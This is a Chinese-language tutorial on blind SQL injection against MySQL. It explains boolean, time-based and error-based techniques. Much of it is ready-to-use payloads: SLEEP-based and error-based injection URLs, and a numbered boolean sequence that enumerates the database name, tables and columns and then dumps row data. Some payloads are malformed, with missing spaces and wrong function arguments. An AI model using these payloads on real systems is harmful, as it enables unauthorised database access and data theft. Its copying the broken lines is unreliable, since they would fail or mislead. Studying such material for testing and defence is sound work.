Blind Injection是什么:
SQL注入过程中,SQL语句执行后,执行的数据不能回显到前端,此时我们需要使用一些特殊的方法进行判断或尝试,这个过程称为盲注;
类型
基于bool 型:
应用程序仅仅根据执行的sql语句返回True(页面)和False(页面);
基于时间型:
所以我们利用函数来判断页面是否发生延迟 ,来判断是否发生注入,如果延迟,则执行失败。
类似搜索这类请求,boolean注入也无能为力,因为搜索返回空也属于正常的,这时就得采用time-based的注入了,即判断请求响应的时间,但该类型注入获取信息的速度非常慢。
如下SQL注入:
1 http://hello.com/view?q=abc' AND (SELECT *FROM (SELECT(SLEEP(5)))VCVe) OR 1 = '
该请求会使MySQL的查询睡眠5S,攻击者可以通过添加条件判断到SQL中,比如IF(substring(version(),1,1)=5, sleep(5), ‘t’) AS value就能做到类似boolean注入的效果,如果睡眠了5s,那么说明MySQL版本为5,否则不是,但这种方式获取信息的速度就会很慢了,因为要做非常多的判断,并且需要花时间等待,不断地去测试出相应的值出来;
基于报错型:
页面能够输出SQL报错信息,则可以从报错信息中获得想要的信息。
典型的就是利用group by的duplicate entry错误。关于这个错误,貌似是MySQL存在的 bug: duplicate key for entry on select?、 SQL Injection attack - What doesthis do?
如下SQL注入:
1http://hello.com/view?id=1%20AND%20(SELECT%207506%20FROM(SELECT%20COUNT(*),CONCAT(0x717a707a71,(SELECT%20MID((IFNULL(CAST(schema_name%20
2 AS%20CHAR),0x20)),1,54)%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20
3 LIMIT%202,1),0x7178786271,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_
4 SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
在抛出的SQL错误中会包含这样的信息: Duplicate entry 'qzpzqttqxxbq1' for key'group_key',其中qzpzq和qxxbq分别是0x717a707a71和0x7178786271,用这两个字符串包住了tt(即数据库名),是为了方便sql注入程序从返回的错误内容中提取出信息;
有三个函数在整个过程中一直被使用
1.mid()函数
mid(string,start,length)
string(必需)规定要返回其中一部分的字符串。
start(必需)规定开始位置(起始值是 1)。
length(可选)要返回的字符数。如果省略,则mid() 函数返回剩余文本。
2.substr()函数
substr(string,start,length)
string(必需)规定要返回其中一部分的字符串。
start(必需)规定在字符串的何处开始。
length(可选)规定被返回字符串的长度。
PS:mysql中的start是从1开始的,而php中的start是从0开始的。
3.left()函数
left(string,length)
string(必需)规定要返回其中一部分的字符串
length(可选)规定被返回字符串的前length长度的字符
4.limit函数
limit( start,rows)(起始位置为0)
limit(2,1) 相当于以第二个表开始向后查询一个表,也就是第三个表
基于bool型:
1 猜解数据库位数:
'and left(database())=7 -- '
2 依次猜解数据库的名称
' and length(database(),1)<'f' -- '(一个字母)
或
' andsubstr((select database()),2,1)<'f' -- '(第二位开始,第一个字符)
3 判断数据库有几个表
1' and (selectcount(*) from information_schema. tables where table_schema=database())=3 -- '
4 判断第一个表名的长度
' and (selectlength(table_name) from information_schema.tables where table_schema=database()limit 0,1)=10-- '
5 判断第二个表名的的第一个字母
' and substr((selecttable_name from information_schema. tables where table_schema=database() limit 1,1),1,1)<'e' --'
6判断第二个表的第二个字母
' and substr((selecttable_name from information_schema. tables where table_schema=database() limit 1,1),2,1)<'e'-- '
7判断facebook中有几列字段
'and (select count(*) from information_schema. columns wheretable_name=0x66616365626F6F6B)=6 -- '
8判断facebook第一个字段有几位
' and (select length(column_name) frominformation_schema. columns where table_name=0x66616365626F6F6B limit 0,1)=2 -- '
9查询facebook表中第三列的第一个字母
' and substr((selectcolumn_name from information_schema. columns wheretable_name=0x66616365626F6F6B limit 2,1),1,1)='c' -- '
脱裤:
10查询facebook中用多少条数据记录
' and (selectcount(*) from facebook)=3 -- '
11查询facebook中name字段第一个数据有几位
'and (select length(name) from facebook limit 0,1)=5 -- '
12facebook中name列字段第一个数据是<xss>
'and substr((select name from facebook limit 0,1),1,5)='<xss>' --'
基于时间型
if(查询语句,1,sleep(4))函数:
如果查询语句正确就返回1(也就是会立即执行),如果查询语句错误返回sleep(4),即延迟4秒执行。
判断注入点:
' andif(1=1,1,sleep(3)) --'
会立即回显
' and if(1=2,1,sleep(3)) --'
3秒后回显
即:根据语句进行bool判断,判断结果只能由时间函数进行输出;